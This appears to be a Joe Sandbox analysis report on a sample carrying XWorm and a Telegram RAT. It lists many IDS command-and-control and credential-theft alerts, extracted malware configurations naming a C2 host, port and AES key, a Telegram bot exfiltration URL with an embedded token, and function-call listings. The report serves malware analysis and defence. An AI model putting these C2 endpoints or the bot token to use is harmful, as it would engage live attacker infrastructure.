                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:18.704467+0200
                SID:2522818
                Source Port:9993
                Destination Port:49730
                Protocol:TCP
                Classtype:Misc Attack
                Timestamp:2024-07-23T15:47:14.425934+0200
                SID:2522164
                Source Port:8443
                Destination Port:49725
                Protocol:TCP
                Classtype:Misc Attack
                Timestamp:2024-07-23T15:47:29.089437+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:08.101444+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:55.809501+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.053785+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:30.643021+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.025178+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:55.344407+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:51.219704+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:42.994902+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:41.798109+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:34.426686+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:18.078854+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:17.388843+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:20.859622+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:55.351253+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:08.098568+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:32.752127+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:38.301171+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:42.997421+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:08.085517+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:46:58.158263+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:32.600904+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:49.516790+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:17.520888+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.164999+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:06.169338+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:17.385354+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:00.114263+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:08.401044+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:20.861210+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:07.878611+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:47.627563+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:28.550933+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:37.604989+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:59.812040+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.026862+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.461487+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:55.353080+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.117172+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:14.913229+0200
                SID:2045868
                Source Port:49726
                Destination Port:8080
                Protocol:TCP
                Classtype:Successful Credential Theft Detected
                Timestamp:2024-07-23T15:49:59.814406+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:29.251375+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:29.351289+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:28.384423+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:39.446554+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:17.517191+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.303596+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:47.625590+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:29.326585+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:46:58.148752+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:06.152311+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:27.721599+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:06.153707+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:28.552358+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.329349+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:29.253527+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.193724+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:34.559540+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:34.423220+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:06.676618+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:32.474944+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:36.175089+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:54.116548+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:18.704444+0200
                SID:2522292
                Source Port:9001
                Destination Port:49729
                Protocol:TCP
                Classtype:Misc Attack
                Timestamp:2024-07-23T15:50:06.394192+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:06.167055+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:06.144575+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:18.223750+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.553033+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:55.572417+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:34.557718+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:36.170319+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:39.444702+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:17.148849+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:06.678354+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:32.602452+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:16.320433+0200
                SID:2045869
                Source Port:49727
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-23T15:50:44.963735+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:09.598849+0200
                SID:2852870
                Source Port:31510
                Destination Port:49423
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:29.102331+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:40.566832+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:55.345362+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:50.399527+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:55.807861+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:41.800241+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:39.086242+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:28.386113+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.191958+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:50.397806+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:08.078426+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.115543+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:38.107132+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:39.083440+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:40.565173+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:07.876303+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:18.076637+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.549041+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:37.602487+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:18.764664+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.463847+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:51.222887+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:06.142825+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:38.084252+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:32.750243+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.255943+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:38.083497+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:18.760725+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.163102+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:54.118696+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:55.576858+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:30.641371+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.327551+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:44.964749+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:49.518442+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:18.220763+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.398996+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:38.094629+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.052337+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:27.727759+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:32.477225+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:16.818128+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:08.402839+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:16.820131+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.302006+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:08.404852+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:06.253951+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["securefirewall.portmap.io"], "Port": "31510", "Aes key": "<19670122>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                Source: ffmaba.exe.5624.19.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeReversingLabs: Detection: 45%
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeReversingLabs: Detection: 45%
                Multi AV Scanner detection for submitted file
                Source: yt7dW9nyJK.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: yt7dW9nyJK.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpackString decryptor: securefirewall.portmap.io
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpackString decryptor: 31510
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpackString decryptor: <19670122>
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpackString decryptor: <Xwormmm>
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpackString decryptor: XWorm V5.2
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpackString decryptor: USB.exe
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09AA50 CRYPTO_free,free,25_2_6C09AA50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09AAC0 CRYPTO_free,free,25_2_6C09AAC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A5D0 CRYPTO_malloc,malloc,25_2_6C09A5D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2C04 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D2C04
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094C29 CRYPTO_zalloc,ERR_put_error,CRYPTO_zalloc,CRYPTO_free,BUF_MEM_grow,25_2_6C094C29
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096C23 CRYPTO_free,25_2_6C096C23
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BCC36 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,25_2_6C0BCC36
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4C41 ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,25_2_6C0B4C41
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4C70 CRYPTO_free,CRYPTO_malloc,ERR_put_error,25_2_6C0E4C70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A8C80 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_flags,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_enc_null,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,__stack_chk_fail,25_2_6C0A8C80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4C98 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,25_2_6C0B4C98
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D4CA8 EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D4CA8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B6CB0 CRYPTO_malloc,CRYPTO_clear_free,25_2_6C0B6CB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AECE9 ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,25_2_6C0AECE9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09ACE7 COMP_expand_block,CRYPTO_malloc,25_2_6C09ACE7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A0D2B CRYPTO_strdup,25_2_6C0A0D2B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4D23 X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,25_2_6C0B4D23
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A4D30 CRYPTO_get_ex_new_index,25_2_6C0A4D30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DAD4B CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,25_2_6C0DAD4B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AAD47 CRYPTO_free,CRYPTO_strdup,25_2_6C0AAD47
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BAD60 BIO_s_file,BIO_new,BIO_ctrl,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,strlen,strncmp,CRYPTO_realloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C0BAD60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2D89 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D2D89
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A4D80 i2d_X509_NAME,i2d_X509_NAME,CRYPTO_free,CRYPTO_free,memcmp,__stack_chk_fail,X509_NAME_hash,25_2_6C0A4D80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096DB8 CRYPTO_free,BIO_clear_flags,BIO_set_flags,memcpy,BIO_snprintf,ERR_add_error_data,__stack_chk_fail,25_2_6C096DB8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DEDBB EVP_PKEY_new,EVP_PKEY_copy_parameters,EVP_PKEY_get0_DH,BN_bin2bn,DH_set0_key,EVP_PKEY_free,CRYPTO_clear_free,25_2_6C0DEDBB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DADC7 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,25_2_6C0DADC7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D0E10 EVP_PKEY_free,EVP_MD_CTX_free,BN_bin2bn,BN_bin2bn,BN_bin2bn,BN_bin2bn,CRYPTO_free,CRYPTO_strndup,__stack_chk_fail,25_2_6C0D0E10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094E20 CRYPTO_zalloc,ERR_put_error,25_2_6C094E20
